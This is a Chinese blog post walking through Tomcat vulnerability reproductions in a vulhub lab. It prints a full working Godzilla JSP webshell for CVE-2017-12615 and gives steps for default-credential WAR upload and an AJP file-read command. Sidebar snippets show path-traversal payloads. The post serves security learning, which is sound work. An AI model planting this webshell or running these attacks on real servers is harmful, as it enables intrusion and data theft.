中间件漏洞复现(一)-Tomcat

已于 2024-08-07 18:46:01 修改
阅读量382 收藏 3
点赞数 13
分类专栏: 漏洞复现 文章标签: tomcat 安全 web安全
于 2024-08-06 15:47:37 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2401_86440467/article/details/140952070
版权

1.CVE-2017-12615

环境使用靶场vulhub(centos7.6虚拟机没拉到环境,使用服务器搭建的环境)

进入/vulhub/tomcat/CVE-2017-12615目录下,启动docker,访问,使用BP抓包

将请求头改为PUT,后面跟上jsp木马文件名,在下面写入jsp木马内容(内容为哥斯拉生成)

<%! String xc="3c6e0b8a9c15224a"; String pass="pass"; String md5=md5(pass+xc); class X extends ClassLoader{public X(ClassLoader z){super(z);}public Class Q(byte[] cb){return super.defineClass(cb, 0, cb.length);} }public byte[] x(byte[] s,boolean m){ try{javax.crypto.Cipher c=javax.crypto.Cipher.getInstance("AES");c.init(m?1:2,new javax.crypto.spec.SecretKeySpec(xc.getBytes(),"AES"));return c.doFinal(s); }catch (Exception e){return null; }} public static String md5(String s) {String ret = null;try {java.security.MessageDigest m;m = java.security.MessageDigest.getInstance("MD5");m.update(s.getBytes(), 0, s.length());ret = new java.math.BigInteger(1, m.digest()).toString(16).toUpperCase();} catch (Exception e) {}return ret; } public static String base64Encode(byte[] bs) throws Exception {Class base64;String value = null;try {base64=Class.forName("java.util.Base64");Object Encoder = base64.getMethod("getEncoder", null).invoke(base64, null);value = (String)Encoder.getClass().getMethod("encodeToString", new Class[] { byte[].class }).invoke(Encoder, new Object[] { bs });} catch (Exception e) {try { base64=Class.forName("sun.misc.BASE64Encoder"); Object Encoder = base64.newInstance(); value = (String)Encoder.getClass().getMethod("encode", new Class[] { byte[].class }).invoke(Encoder, new Object[] { bs });} catch (Exception e2) {}}return value; } public static byte[] base64Decode(String bs) throws Exception {Class base64;byte[] value = null;try {base64=Class.forName("java.util.Base64");Object decoder = base64.getMethod("getDecoder", null).invoke(base64, null);value = (byte[])decoder.getClass().getMethod("decode", new Class[] { String.class }).invoke(decoder, new Object[] { bs });} catch (Exception e) {try { base64=Class.forName("sun.misc.BASE64Decoder"); Object decoder = base64.newInstance(); value = (byte[])decoder.getClass().getMethod("decodeBuffer", new Class[] { String.class }).invoke(decoder, new Object[] { bs });} catch (Exception e2) {}}return value; }%><%try{byte[] data=base64Decode(request.getParameter(pass));data=x(data, false);if (session.getAttribute("payload")==null){session.setAttribute("payload",new X(this.getClass().getClassLoader()).Q(data));}else{request.setAttribute("parameters",data);java.io.ByteArrayOutputStream arrOut=new java.io.ByteArrayOutputStream();Object f=((Class)session.getAttribute("payload")).newInstance();f.equals(arrOut);f.equals(pageContext);response.getWriter().write(md5.substring(0,16));f.toString();response.getWriter().write(base64Encode(x(arrOut.toByteArray(), true)));response.getWriter().write(md5.substring(16));} }catch (Exception e){}
%>

放包后,使用哥斯拉测试连接

2.tomcat8

进入vulhub-master/tomcat/tomcat8目录下启动容器,访问后登录默认账户密码都为tomcat

登录成功后,将jsp木马压缩为zip,将后缀改为war上传

上传成功后,能够从上面看到

哥斯拉连接,拼接路径为压缩文件名/jsp文件

3.CVE-2020-1938

进入vulhub-master/tomcat/CVE-2020-1938目录下,docker-compose up -d启动环境,访问

此漏洞利用原理为:tomcat默认的conf/server.xml中配置了2个Connector,一个为8080的对外提供HTTP协议端口;另一个为默认的8009AJP协议端口,两个端口默认监听在外网ip,

此漏洞为文件包含漏洞,可以通过tomcat读取或包含tomcat

故直接使用工具利用文件包含漏洞(无论打开端口,此漏洞都使用8009)

python2 '/root/桌面/CVE-2020-1938-Tomact-file_include-file_read-master/Tomcat-ROOT路径下文件包含(CVE-2020-1938).py' -p 8009 -f /WEB-INF/web.xml ip

 

tomcat漏洞复现结束,欢迎指出错误和讨论

Jhin-Askeladd
关注
专栏目录
常见中间件漏洞复现
君莫hacker的博客
11-08 8907
常见中间件漏洞复现 中间件Tomcat Apache IIS Jboss Weblogic Nginx 目录tomcat中间件1.tomcat文件上传(CVE-2017-12615) tomcat中间件 1.tomcat文件上传(CVE-2017-12615) 环境:线上环境 vulfocus 影响版本:Tomcat 7.0.0 - 7.0.81
服务攻防-中间件安全&CVE复现&IIS&Apache&Tomcat&Nginx漏洞复现
ran的博客
05-13 2752
ISS中间件(Internet Security and Acceleration Server Middleware)是微软公司推出的一种安全中间件,旨在提供高效的安全代理服务和网络加速功能。它是Microsoft Proxy Server和Microsoft Firewall产品的继承者,也是Microsoft Forefront TMG(Threat Management Gateway)的前身。
常见中间件漏洞复现之【Tomcat】!
muyuchen110的博客
08-06 1288
Tomcat介绍JavaWeb程序的装载,是配置JSP(Java Server Page)和JAVA系统必备的⼀款环境。在历史上也披露出来了很多的漏洞 , 这⾥我们讲⼏个经典的漏洞复现漏洞描述由默认值设置为false),攻击者将有可能可通过精⼼构造的攻击请求数据包向服务器上传包含任意代码的 JSP ⽂件,JSP⽂件中的恶意代码将能被服务器执⾏。导致服务器上的数据泄露或获取服务器权限。漏洞原理⽣,(需要允许put请求) , 攻击者可以利⽤PUT⽅法通过精⼼构造的数据包向存在漏洞的服务器⾥⾯上。
常见中间件漏洞(一、Tomcat合集)
2301_76631050的博客
08-06 745
tomcat是一个开源而且免费的jsp服务器,默认端口:8080,属于轻量级应用服务器。它可以实现JavaWeb程序的装载,是配置JSP(Java Server Page)和JAVA系统必备的一款环境。在历史上也披露出来了很多的漏洞,这里我们讲几个经典的漏洞复现
中间件漏洞 -- Tomcat
weixin_44769042的博客
11-15 1400
中间件漏洞记录--4 1.Tomcat 任意文件写入(CVE-2017-12615) 漏洞原理 漏洞本质是Tomcat配置文件/conf/web.xml 配置了可写(readonly=false),导致我们可以往服务器写文件 1> 漏洞环境:docker+vulhub cd vulhub/tomcat/CVE-2017-12615 docker-compose build docker-compose up -d 搭建成功 2>抓包修改 PUT /1.jsp/...
【vulhub靶场】Tomcat中间件漏洞复现
M372109150的博客
05-04 2077
本文主要是对tomcat中间件相关漏洞复现,包括Tomcat AJP 任意文件读取/包含漏洞 (CVE-2020-1938)、Tomcat 任意文件写入漏洞 (CVE-2017-12615)以及Tomcat 弱密码和后端 Getshell 漏洞
常见中间件——Tomcat漏洞复现分析
qq_45751902的博客
10-31 3306
(net命令的路径要写全,直接写net user,Tomcat控制台会提示net不是内部命令,也不是可运行的程序,另 必须使用+号连接,使用空格,%2B都会执行失败,控制台报错。,则在9.0.1(Beta),8.5.23,8.0.47和7.0.82之前的所有Tomcat版本都包含所有操作系统上的潜在危险的CVE-2017-12615漏洞。访问 http://127.0.0.1:8080/manager/html ,输入弱口令tomcat/tomcat进入后台(弱口令可以进行爆破)
tomcat中间件漏洞复现
mingyqf的博客
02-14 3966
Apache Tomcat文件包含漏洞CVE-2020-1938 一、漏洞描述 Tomcat是Apache开源组织开发的用于处理HTTP服务的项目,两者都是免费的,都可以做为独立的Web服务器运行。Apache Tomcat服务器存在文件包含漏洞,攻击者可利用该漏洞读取或包含 Tomcat 上所有 webapp 目录下的任意文件,如:webapp 配置文件或源代码等。 二、漏洞危害等级 高 三、影响版本 Apache Tomcat 6 Tomcat 7系列 <7.0.100 To
vulhub靶场-tomcat漏洞复现
m0_62008601的博客
07-23 1436
tomcat漏洞复现合集
漏洞复现】---- ActiveMQ 反序列化漏洞(CVE-2015-5254)
qq_43168364的博客
09-04 702
一、简介 Apache ActiveMQ是老外所研发的一套开源的消息中间件,它支持Java消息服务、集群、Spring Framework等。该漏洞源于程序没有限制可在代理中序列化的类。攻击者可以借助特制的序列化的java消息服务(JMS)ObjectMessage对象利用该漏洞执行恶意代码。 漏洞影响的版本为:Apache ActiveMQ 5.13.0之前的版本。 二、漏洞环境准备 pull下来内容 环境运行后,将监听61616和8161两个端口。其中61616是工作端口,消息在这个端口进行传递
中间件安全-CVE漏洞复现+Apache+Tomcat+Nginx
xiaoheizi的博客
07-13 311
将访问路径更改为:/icons/.%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/etc/passwd 因为是Unix系统,所以敏感信息在/etc/passwd下,放包成功获取数据。将访问路径更改为:/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh。点击测试链接,如果测试成功就点击添加。打开vulfocus靶场,启动漏洞环境,打开漏洞地址。打开vulfocus靶场,启动漏洞环境,打开漏洞地址。
Tomcat put方法任意文件上传漏洞(CVE-2017-12615)复现
君莫hacker的博客
09-15 8104
目录0x01 漏洞介绍0x02 环境部署:0x03 漏洞复现1. 访问主页2. 漏洞测试3. 上传jsp木马--命令执行4. 上传成功,执行命令5. 上传jsp一句话木马6. 上传成功,冰蝎连接0x04 漏洞修复 0x01 漏洞介绍 漏洞描述 在一定条件下,攻击者可以利用这个漏洞,获取用户服务器上 JSP 文件的源代码,或是通过精心构造的攻击请求,向用户服务器上传恶意JSP文件,通过上传的 JSP 文件 ,可在用户服务器上执行任意代码,从而导致数据泄露或获取服务器权限,存在高安全风险 漏洞编号 CV
在springboot中如何使用Jetty替换Tomcat
tyxjolin的专栏
09-08 467
BIO是传统的同步阻塞IO,即客户端发起请求,服务器必须开一个线程接收请求,并开启一个线程进行处理,直到处理完毕后再通过一个线程返回结果。在高并发的情况下,服务器线程开销巨大,容易导致线程堆积和资源浪费。
MyBatis之手动映射
最新发布
cyt涛的博客
09-11 1039
在一些简单的场景下,MyBatis 能够自动完成对象和数据库字段之间的映射,这时就不需要手动映射。在MyBatis的XML文件中,我们可以通过来进行手动映射。这种方式适合需要映射复杂对象的情况,比如下面的用户和地址信息的场景。下面是如何在MyBatis的XML文件中编写手动映射的示例。
SpringBoot集成MyBatis-Plus
2401_82806976的博客
09-10 976
(简称 MP)是一个MyBatis的增强工具,在MyBatis的基础上只做增强不做改变,为简化开发、提高效率而生。1.愿景我们的愿景是成为 MyBatis 最好的搭档,就像 魂斗罗 中的 1P、2P,基友搭配,效率翻倍。MyBatis-Plus特性:无侵入: 只做增强不做改变,引入它不会对现有工程产生影响,如丝般顺滑损耗小: 启动即会自动注入基本 CURD,性能基本无损耗,直接面向对象操作。
第六章 SqlSession 执行 Mapper 过程
在那一刻,我们或许会发现自己站在了时间的另一岸,以更加成熟和宽广的胸怀,去拥抱那份隔代相传的深情。
09-10 563
在 MyBatis 3 中,SqlSession执行 Mapper 的过程是一个涉及多个组件和步骤的复杂流程。这个流程主要依赖于 MyBatis 的核心组件,包括配置解析、SQL 映射器(Mapper)、动态 SQL 构建、SQL 执行以及结果映射等。下面是一个简化的过程描述,说明了SqlSession如何执行 Mapper 中的方法。
【JAVA基础】实现Tomcat基本功能
weixin_51325964的博客
09-10 1160
java基础 简易tomcat
快速失败 (fail-fast) 和安全失败 (fail-safe)
Flying_Fish_roe的博客
09-07 984
快速失败是一种系统设计原则,当系统遇到异常情况或错误时,立即停止执行并返回错误,而不是试图继续执行或处理潜在的问题。快速失败系统会主动检测系统中的问题,并尽早报告错误,以防止错误进一步传播或导致更大的问题。在快速失败系统中,当检测到某些异常条件或不一致时,系统立即抛出异常或错误,停止当前操作并通知用户或开发者。这种机制通常用于防止错误堆积,使得系统可以快速恢复到正常状态,并尽早解决问题。快速失败的核心思想是“及早报告、及早修复”。通过尽早暴露错误,开发者能够更容易地定位问题,减少问题在系统中的蔓延。
中间件tomcat复现
09-09
您好!要复现中间件Tomcat的问题,您可以按照以下步骤进行操作: 1. 安装Tomcat:首先,您需要从Tomcat的官方网站(https://tomcat.apache.org)下载适合您系统的Tomcat安装文件,并按照官方文档的说明进行安装。 2. 配置Tomcat:安装完成后,您需要对Tomcat进行一些基本配置。这包括设置端口号、配置虚拟主机、添加Web应用程序等。您可以编辑Tomcat的配置文件(如server.xml、web.xml)来进行相关配置。 3. 部署应用程序:将您的Web应用程序部署到Tomcat中。您可以将应用程序的WAR文件放置在Tomcatwebapps目录下,或者通过Tomcat的控制台进行部署。 4. 复现问题:根据您所遇到的具体问题,在相应的环境中操作以复现问题。可能涉及到某些特定的请求、参数、配置等。您可以根据问题描述和错误日志来进行调试和分析。 5. 查找解决方案:一旦问题复现成功,您可以尝试查找解决方案。这可以通过搜索相关的错误信息、查看Tomcat官方文档、咨询社区论坛等方式进行。 请注意,上述步骤仅是一个大致的指引,具体操作可能因实际情况而有所不同。如果您遇到了特定的问题,建议您提供更详细的信息,这样我可以给予更准确的帮助。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值